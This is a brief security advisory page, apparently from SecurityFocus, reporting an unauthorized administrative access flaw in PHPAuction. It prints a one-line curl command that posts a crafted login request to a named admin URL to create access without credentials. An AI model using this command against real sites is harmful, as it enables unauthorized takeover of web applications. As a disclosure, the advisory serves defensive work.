PHPAuction Unauthorized Administrative Access Vulnerability

No exploit is required. <ethx@hotmail.com> has contributed the following curl command, which is sufficent for exploitation:

curl http://pro.phpauction.org/proplus/admin/login.php -d "action=insert" -d "username=test" -d "password=test"


 

Privacy Statement
Copyright 2010, SecurityFocus